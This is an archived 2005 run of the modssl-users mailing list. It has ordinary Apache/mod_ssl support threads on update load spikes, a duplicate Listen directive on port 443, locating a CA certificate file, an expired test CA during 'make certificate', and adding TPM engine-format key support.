Date: Mon, 26 Sep 2005 18:20:01 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: Mod_ssl and how to reduce overhead
In-Reply-To: <20050926194806.GC31961@ligo.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>
	 
	 <06e501c5c296$b8334d60$02fea8c0@desktop>
	 
	 <002201c5c2ae$e8120400$02fea8c0@desktop> <20050926172728.GH26776@cr>
	 <006801c5c2ce$9cf28c40$02fea8c0@desktop>
	 <20050926194806.GC31961@ligo.caltech.edu>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 9/26/05, Phil Ehrens  wrote:
> Pigeon wrote:
> > (The reason I say 10k concurrent is because we have an update system (s=
orta
> > like windows update).. and as soon as we tell their computer to update,=
 we
> > have 10k boxes saying give me the file!)

I think I agree with the guy who said this thread has pretty much been
asked and answered at this point, but I figured I'd just throw in one
more little nugget for you to think about.

It sounds to me from the limited information above that you're causing
your own problem here by instructing 10k-100k clients to update
themselves with some multi-megabyte patch file simultaneously.  This
is obviously a huge amount of bandwidth, but it doesn't seem obvious
to me that it would be a huge amount of bandwidth on a 24/7 basis...
rather it would come in bursts _at times specified by you_.  This to
me begs for a software engineering effort rather than a
sysadmin/netadmin effort; if you can get the clients to wait some
random length of time after receiving the "update available"
notification prior to requesting the update, your number of concurrent
accesses will drop dramatically.  Alternatively, if you have more
control over the server-side code than the client-side code, you could
publish the "update available" notification TO the clients a handful
at a time rather than all at the same time.

Hope this helps, and best of luck...

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 27 22:08:52 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9F02714D82B; Tue, 27 Sep 2005 22:08:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mxsf27.cluster1.charter.net (mxsf27.cluster1.charter.net [209.225.28.227])
	by master.modssl.org (Postfix) with ESMTP id 3F38414D836
	for ; Tue, 27 Sep 2005 22:08:51 +0200 (CEST)
Received: from mxip26a.cluster1.charter.net (mxip26a.cluster1.charter.net [209.225.28.181])
	by mxsf27.cluster1.charter.net (8.12.11/8.12.11) with ESMTP id j8RK8Z5L000475
	for ; Tue, 27 Sep 2005 16:08:49 -0400
Received: from 68-117-211-186.dhcp.athn.ga.charter.com (HELO desktop) ([68.117.211.186])
  by mxip26a.cluster1.charter.net with SMTP; 27 Sep 2005 16:08:19 -0400
X-IronPort-AV: i="3.97,150,1125892800"; 
   d="scan'208"; a="260826165:sNHT423332936"
Message-ID: <005201c5c39f$3a7af440$02fea8c0@desktop>
From: "Pigeon" 
To: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop>  <002201c5c2ae$e8120400$02fea8c0@desktop> <20050926172728.GH26776@cr> <006801c5c2ce$9cf28c40$02fea8c0@desktop> <20050926194806.GC31961@ligo.caltech.edu> 
Subject: Re: Mod_ssl and how to reduce overhead (Thanks!)
Date: Tue, 27 Sep 2005 16:08:24 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pigeon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks for all the great info!

It definitly gives me a nice footing from which I can start.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 29 10:40:29 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 64E3814D86E; Thu, 29 Sep 2005 10:40:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cse.snu.ac.kr (cse.snu.ac.kr [147.46.127.34])
	by master.modssl.org (Postfix) with ESMTP id 9471014D83E
	for ; Thu, 29 Sep 2005 10:40:27 +0200 (CEST)
Received: from [147.46.247.198] ([147.46.247.198])
	(authenticated bits=0)
	by cse.snu.ac.kr (8.13.4/8.13.4/Debian-1) with ESMTP id j8T8eXK1021436
	for ; Thu, 29 Sep 2005 17:40:34 +0900
Mime-Version: 1.0 (Apple Message framework v734)
In-Reply-To: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr> 
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
Message-Id: 
Content-Transfer-Encoding: 7bit
From: Bob McKay 
Subject: Re: Re:
Date: Thu, 29 Sep 2005 17:40:19 +0900
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.734)
X-BacchusMilter: Spam Blocker with perl
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bob McKay 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Dear Cliff,
     Thanks for your help.
On 26/09/2005, at 21:22, Cliff Woolley wrote:

> It really does sound like there's something else listening on port  
> 443:
>
>
>> "Starting httpd: (98)Address already in use: make_sock: could not
>> bind to address :443
>> no listening sockets available, shutting down"
>>
>
> That's usually what this message means.  You said:
>
>
>> Oh, and there isn't anything else listening to port 443:
>> /sbin/fuser -4 -n udp 443
>> gives a null result.
>>
>
> ... except that it's tcp, not udp, that we care about here.

Apologies; tcp gives a null result also. I'm pretty sure nothing but  
httpd is
listening there.

>
> As for your httpd.conf, it looks sort of close, although the
> ":443>" block needs to have the SSL
> certificate and key configuration directives as well as some other
> stuff (see the example httpd.conf that comes with mod_ssl), and the
> "" block should NOT contain "SSLEngine on".

The "SSLEngine on" in  was an error on my part, in  
tidying up the sample I accidentally
pasted a duplicate in the wrong place - it's _not_ in the httpd.conf

However the key information really is missing. So it looks like this  
may be a
problem in the fedora httpd configuration tool, because the key  
information definitely is
there in the virtual host configuration in the gui, it's just not  
getting saved for some reason.
Probably, I have a syntax error somewhere (but even so, the tool  
shouldn't fail it silently).
I think this takes it out of modssl, so my next step will be to check  
the fedora mailing lists,
and report it as a bug if it hasn't been already. Then I guess I'll  
have to take the plunge,
and edit the httpd.conf manually.
>
> Hope this helps,
> --Cliff
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>

***********************************************************************
Bob McKay
521-302, School of Computer Science & Engineering,
College of Engineering, Seoul National University, San 56-1,
Sinlim-dong, Gwanak-gu, Seoul 151-744, Korea

Tel:      +82 2 880 9392
email: rim@cse.snu.ac.kr
web:   http://sc.snu.ac.kr




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 29 14:13:24 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 641E314D86E; Thu, 29 Sep 2005 14:13:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.203])
	by master.modssl.org (Postfix) with ESMTP id 03E7D14D83E
	for ; Thu, 29 Sep 2005 14:13:23 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h30so1645011wxd
        for ; Thu, 29 Sep 2005 05:13:20 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=LXnYDrzMOBMr8shvv4s/3mrLxK0HTjcnfp+MfhjU5vify0ICG4H/V7HcsLwFXUyCVkVSf+XLewjtQzZmDo81KEqCnNcH3cjK/lnv32VmX8jO94vupmTpfhzNcMmpkZDa5dnJtyUCTixfaG2eLrukj5hG0hkQPKieBAjEmPYjgQk=
Received: by 10.70.72.11 with SMTP id u11mr478626wxa;
        Thu, 29 Sep 2005 05:13:20 -0700 (PDT)
Received: by 10.70.75.5 with HTTP; Thu, 29 Sep 2005 05:13:20 -0700 (PDT)
Message-ID: 
Date: Thu, 29 Sep 2005 08:13:20 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: Re:
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>
	 
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> >> "Starting httpd: (98)Address already in use: make_sock: could not
> >> bind to address :443
> >> no listening sockets available, shutting down"
> However the key information really is missing. So it looks like this
> may be a problem in the fedora httpd configuration tool, because the key
> information definitely is
> there in the virtual host configuration in the gui, it's just not
> getting saved for some reason.

Okay... although I don't think we've yet found a good explanation for
why you're getting the message you're getting.  Perhaps duplicate
Listen statements?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 29 18:35:07 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 44D2614D86E; Thu, 29 Sep 2005 18:35:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.204])
	by master.modssl.org (Postfix) with ESMTP id C78D614D83E
	for ; Thu, 29 Sep 2005 18:35:04 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h32so884711wxd
        for ; Thu, 29 Sep 2005 09:35:02 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=qcDdWM4BuDcum/RR6GpY49TzO8U03+AkpNg4AqWS82IhgaFEqvd533c9+KRZvUy2abn5cYPXn0vyfYb2ERLaLvtm2UplzhEjITSmqKOQo+9OXbbSi648RON1JVg3pXqInTlUtX+YZIwYoIa7WIQxVzFbw9dmOBYJHRSHV9vOJGo=
Received: by 10.70.55.19 with SMTP id d19mr25725wxa;
        Thu, 29 Sep 2005 09:28:35 -0700 (PDT)
Received: by 10.70.57.7 with HTTP; Thu, 29 Sep 2005 09:28:35 -0700 (PDT)
Message-ID: <499d6ed30509290928x1d2cc3e9h31a8a4524fae6a42@mail.gmail.com>
Date: Thu, 29 Sep 2005 11:28:35 -0500
From: Kent Yoder 
To: modssl-users@modssl.org
Subject: engine format keys
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kent Yoder 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

  I've been looking into enabling apache+mod_ssl to use hardware keys
encrypted by a TPM.  I have openssl's s_server test working using an
openssl TPM engine [1] and trousers [2].  It looks like the key to
getting this working in apache is support for engine format keys in
mod_ssl.  Is there any interest in enabling engine format keys in
mod_ssl, or, is there another path to accomplish what I'm trying to
do?

Thanks,
Kent

[1] http://cvs.sourceforge.net/viewcvs.py/trousers/applications/openssl_tpm=
_engine/
[2] http://trousers.sf.net
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 30 12:28:52 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4F7EE14D874; Fri, 30 Sep 2005 12:28:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cse.snu.ac.kr (cse.snu.ac.kr [147.46.127.34])
	by master.modssl.org (Postfix) with ESMTP id 77AF514D836
	for ; Fri, 30 Sep 2005 12:28:50 +0200 (CEST)
Received: from [147.46.247.198] ([147.46.247.198])
	(authenticated bits=0)
	by cse.snu.ac.kr (8.13.4/8.13.4/Debian-1) with ESMTP id j8UASuVo015089
	for ; Fri, 30 Sep 2005 19:28:56 +0900
Mime-Version: 1.0 (Apple Message framework v734)
In-Reply-To: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>   
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
Message-Id: 
Content-Transfer-Encoding: 7bit
From: Bob McKay 
Subject: Re: Re: Re: httpd configuration problem
Date: Fri, 30 Sep 2005 19:28:39 +0900
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.734)
X-BacchusMilter: Spam Blocker with perl
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bob McKay 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Solution (mostly) found. The problem is with a misconfiguration of  
the Fecora Core 4
http configuration tool: the tool doesn't know about the split in  
configuration files
in core 4 (httpd.conf in /etc/httpd/conf, ssl.conf in /etc/httpd/ 
conf.d). ssl.conf already
contains a Listen on 443 directive, so the listen on 443 directive  
which the configuration
tool creates in httpd.conf is a duplicate, and causes a duplicate  
listener problem.

I'll report the bug on bugzilla (my solution is to comment out the  
listent directive in ssl.conf,
so I can still use the configuration tool). I'm still left with one  
relatively minor problem. Fedora has a nice
Makefile support for creating certificates, including self-signed  
certificates, which is what I
need. However there is no provision for creating a chain file, yet  
the configuration tool insists
on there being one (it crashes otherwise). I put in a ca-bundle, and  
it appears to work, but it's
clearly not the right solution. What should go there? Or is there an  
appropriate way to create
my own chain file? Or is the configuration tool just wrong in  
insisting on one?

     Thanks for any suggestions
     Bob McKay

On 29/09/2005, at 21:13, Cliff Woolley wrote:

>>>> "Starting httpd: (98)Address already in use: make_sock: could not
>>>> bind to address :443
>>>> no listening sockets available, shutting down"
>>>>
>> However the key information really is missing. So it looks like this
>> may be a problem in the fedora httpd configuration tool, because  
>> the key
>> information definitely is
>> there in the virtual host configuration in the gui, it's just not
>> getting saved for some reason.
>>
>
> Okay... although I don't think we've yet found a good explanation for
> why you're getting the message you're getting.  Perhaps duplicate
> Listen statements?
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>

***********************************************************************
Bob McKay
521-302, School of Computer Science & Engineering,
College of Engineering, Seoul National University, San 56-1,
Sinlim-dong, Gwanak-gu, Seoul 151-744, Korea

Tel:      +82 2 880 9392
email: rim@cse.snu.ac.kr
web:   http://sc.snu.ac.kr




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct  1 02:11:47 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3218514D867; Sat,  1 Oct 2005 02:11:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mxsf02.cluster1.charter.net (mxsf02.cluster1.charter.net [209.225.28.202])
	by master.modssl.org (Postfix) with ESMTP id BDBB614D842
	for ; Sat,  1 Oct 2005 02:11:46 +0200 (CEST)
Received: from mxip14a.cluster1.charter.net (mxip14a.cluster1.charter.net [209.225.28.144])
	by mxsf02.cluster1.charter.net (8.12.11/8.12.11) with ESMTP id j910BijK029961
	for ; Fri, 30 Sep 2005 20:11:44 -0400
Received: from 68-117-211-186.dhcp.athn.ga.charter.com (HELO desktop) (68.117.211.186)
  by mxip14a.cluster1.charter.net with SMTP; 30 Sep 2005 20:11:45 -0400
X-IronPort-AV: i="3.97,163,1125892800"; 
   d="scan'208"; a="814828678:sNHT15556216"
Message-ID: <005a01c5c61c$b69529e0$02fea8c0@desktop>
From: "Pigeon" 
To: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop>  <002201c5c2ae$e8120400$02fea8c0@desktop> 
Subject: Grr.. where is my CA's Certificate file?
Date: Fri, 30 Sep 2005 20:11:47 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pigeon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello, I am trying to setup apache to use a PKI (I think that is what it is 
called)... So each client will have to already have a public key to have 
access to my 'secure' apache server. I might hand out 5 of these public 
keys, and I want only those users to have access to this server.

My issue is this.. I cannot find my CA's certificate file (so I can tell 
ssl.conf about it via SSLCACertificateFile).

I have run  CA.pl -newca and then it creates these files:

>>--<<
[root@localhost demoCA]# ls
cacert.pem  careq.pem  certs  crl  index.txt  index.txt.attr  index.txt.old 
newcerts  private  serial
[root@localhost demoCA]# ls -R
.:
cacert.pem  careq.pem  certs  crl  index.txt  index.txt.attr  index.txt.old 
newcerts  private  serial

./certs:

./crl:

./newcerts:
EC895C0D3F2DC916.pem

./private:
cakey.pem
[root@localhost demoCA]#
>>--<<
but now where is the file I tell ssl.conf about via  SSLCACertificateFile.


Sorry to bother you'll, but I have been trying to find this out nearly all 
day.. without sucess :(

thanks for any input!
Lee 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct  1 13:10:08 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3C0A414D850; Sat,  1 Oct 2005 13:10:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from one.mteege.de (one.mteege.de [82.149.227.10])
	by master.modssl.org (Postfix) with ESMTP id EE81C14D829
	for ; Sat,  1 Oct 2005 13:10:07 +0200 (CEST)
Received: (qmail 78503 invoked by uid 66); 1 Oct 2005 11:10:29 -0000
Received: (qmail 65169 invoked by uid 0); 1 Oct 2005 11:06:13 -0000
Received: from scl-14.mteege.de (HELO ?10.8.0.14?) (10.8.0.14)
  by 0 with SMTP; 1 Oct 2005 11:06:13 -0000
Message-ID: <433E6D91.7080701@mteege.de>
Date: Sat, 01 Oct 2005 13:05:53 +0200
From: Matthias Teege 
User-Agent: Mozilla Thunderbird 1.0.6 (Macintosh/20050716)
X-Accept-Language: de-DE, de, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: make certificate hangs
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matthias Teege 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Moin,

I've setup modssl with apache. I've followed the example from
modssl.org. Then i try "make certificate type=custom" and it hangs at
this point:

Getting CA Private Key
Verify: matching certificate & key modulus
Verify: matching certificate signature
../conf/ssl.crt/server.crt: OK

After that I made "make certificate type=test" and it hangs to:

Getting CA Private Key
Verify: matching certificate & key modulus
Verify: matching certificate signature
../conf/ssl.crt/server.crt: /C=XY/ST=Snake Desert/L=Snake Town/O=Snake
Oil, Ltd/OU=Certificate Authority/CN=Snake Oil
CA/emailAddress=ca@snakeoil.dom
error 10 at 1 depth lookup:certificate has expired
OK

How can I "debug" this issue?

Matthias

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct  1 18:06:17 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1480214D850; Sat,  1 Oct 2005 18:06:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.199])
	by master.modssl.org (Postfix) with ESMTP id 2A78C14D829
	for ; Sat,  1 Oct 2005 18:06:15 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id t7so79452wxc
        for ; Sat, 01 Oct 2005 09:06:14 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=LJ4iM3mrCCp/NwqUtbfVct0fqBvzKbJoHaGRYegkWQmFAvtD17E/yNLhMjHYVrKv05V9pZnNmFZsQ5qsXYO7Hk9E+zlKsPQo8fE2ThnjsdRB3txU5De7ORVYXy62k2x+p09xcagNk/dkAJK7r+/EkdUpKBuUcJAlRek8mlz8I4c=
Received: by 10.70.74.9 with SMTP id w9mr1250239wxa;
        Sat, 01 Oct 2005 09:06:14 -0700 (PDT)
Received: by 10.70.75.5 with HTTP; Sat, 1 Oct 2005 09:06:14 -0700 (PDT)
Message-ID: 
Date: Sat, 1 Oct 2005 12:06:14 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: make certificate hangs
In-Reply-To: <433E6D91.7080701@mteege.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <433E6D91.7080701@mteege.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

"make certificate" is largely deprecated at this point, as far as I'm
concerned... it doesn't even ship with Apache 2.0 + mod_ssl.  The
expiration could be considered a bug in Apache 1.3's mod_ssl, but IMO
the best thing for you to do is to follow the steps in the mod_ssl
documentation for creating your own self-signed certificate using
openssl by hand.  The documentation isn't perfect, but that route is
still probably the best option right now that I know of.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  3 18:14:42 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CBC0C14D867; Mon,  3 Oct 2005 18:14:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.203])
	by master.modssl.org (Postfix) with ESMTP id 5A2C114D837
	for ; Mon,  3 Oct 2005 18:14:41 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h32so104585wxd
        for ; Mon, 03 Oct 2005 09:14:41 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=aKKx0txNrB9lPPeq7zGAQQTC1+bKUfTXEMQoIA/qrOZbg+5sScKTauEzOjRo/67EL/2PI6CtFmYvv5AZunEWqYuYCHvI3czmoBPtcqZy2/Arj6hjCaKjzpXiV6HZfHdMJ1znh9ahl1nD+4Vw4d1ote+MKvkhZ22X8WPtr3/sxaM=
Received: by 10.70.57.3 with SMTP id f3mr92142wxa;
        Mon, 03 Oct 2005 09:14:41 -0700 (PDT)
Received: by 10.70.57.7 with HTTP; Mon, 3 Oct 2005 09:14:41 -0700 (PDT)
Message-ID: <499d6ed30510030914p4b34da77tc4ca4a6c1ded2487@mail.gmail.com>
Date: Mon, 3 Oct 2005 11:14:41 -0500
From: Kent Yoder 
To: modssl-users@modssl.org
Subject: Re: engine format keys
In-Reply-To: <499d6ed30509290928x1d2cc3e9h31a8a4524fae6a42@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <499d6ed30509290928x1d2cc3e9h31a8a4524fae6a42@mail.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kent Yoder 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

  This should be a relatively trivial change to
ssl_pphrase_Handle()...  if szCryptoDevice is non-NULL, pass the
private key path as the key_id to ENGINE_load_private_key.   If that
fails, fall back to the normal PEM loading code...

Kent

>   I've been looking into enabling apache+mod_ssl to use hardware keys
> encrypted by a TPM.  I have openssl's s_server test working using an
> openssl TPM engine [1] and trousers [2].  It looks like the key to
> getting this working in apache is support for engine format keys in
> mod_ssl.  Is there any interest in enabling engine format keys in
> mod_ssl, or, is there another path to accomplish what I'm trying to
> do?
>
> Thanks,
> Kent
>
> [1] http://cvs.sourceforge.net/viewcvs.py/trousers/applications/openssl_t=
pm_engine/
> [2] http://trousers.sf.net
>


--
Kent Yoder
IBM LTC Security Dev.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  4 04:17:01 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3D05C14D876; Tue,  4 Oct 2005 04:17:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from geiger.vandervecken.com (geiger.vandervecken.com [203.97.150.130])
	by master.modssl.org (Postfix) with ESMTP id 57DF414D83D
	for ; Tue,  4 Oct 2005 04:16:58 +0200 (CEST)
Received: from geoff by geiger.vandervecken.com with local (Exim 4.50)
	id 1EMcML-0000La-FW; Tue, 04 Oct 2005 15:16:49 +1300
From: Geoff Thorpe 
To: modssl-users@modssl.org
Subject: Re: engine format keys
Date: Mon, 3 Oct 2005 22:16:42 -0400
User-Agent: KMail/1.8.1
References: <499d6ed30509290928x1d2cc3e9h31a8a4524fae6a42@mail.gmail.com>
In-Reply-To: <499d6ed30509290928x1d2cc3e9h31a8a4524fae6a42@mail.gmail.com>
Cc: Kent Yoder 
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-Id: <200510032216.42663.geoff@geoffthorpe.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Kent,

On September 29, 2005 12:28 pm, Kent Yoder wrote:
>   I've been looking into enabling apache+mod_ssl to use hardware keys
> encrypted by a TPM.  I have openssl's s_server test working using an
> openssl TPM engine [1] and trousers [2].  It looks like the key to
> getting this working in apache is support for engine format keys in
> mod_ssl.  Is there any interest in enabling engine format keys in
> mod_ssl, or, is there another path to accomplish what I'm trying to
> do?

Sorry I didn't notice this earlier. I added some hooks to modssl ages ago=20
to support engine ctrl-commands if that helps. In fact you may have to=20
jiggle with this patch if you want to update it to the latest mod_ssl=20
version, but it may be easier than redoing it from scratch;

   http://www.geoffthorpe.net/crypto/

If you get it running with a more recent version and feel like giving me a=
=20
newer diff, I'd appreciate being able to replace the one on my site. I=20
don't think Ralf wants to include this functionality now that mod_ssl is=20
just in maintenance-mode and (kinda) deprecated in favour of apache2.

Cheers,
Geoff

=2D-=20
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

M=EAme ceux qui se sentent pas des n=F4tres, ne nous voyant plus =E0 genoux,
seront, plus que jamais, chez eux chez nous.
  -- Loco Locass
______________________________________________________________________
